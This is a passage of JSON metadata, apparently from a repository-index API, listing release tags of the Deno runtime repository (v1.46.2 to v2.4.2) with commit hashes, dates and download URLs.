07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denola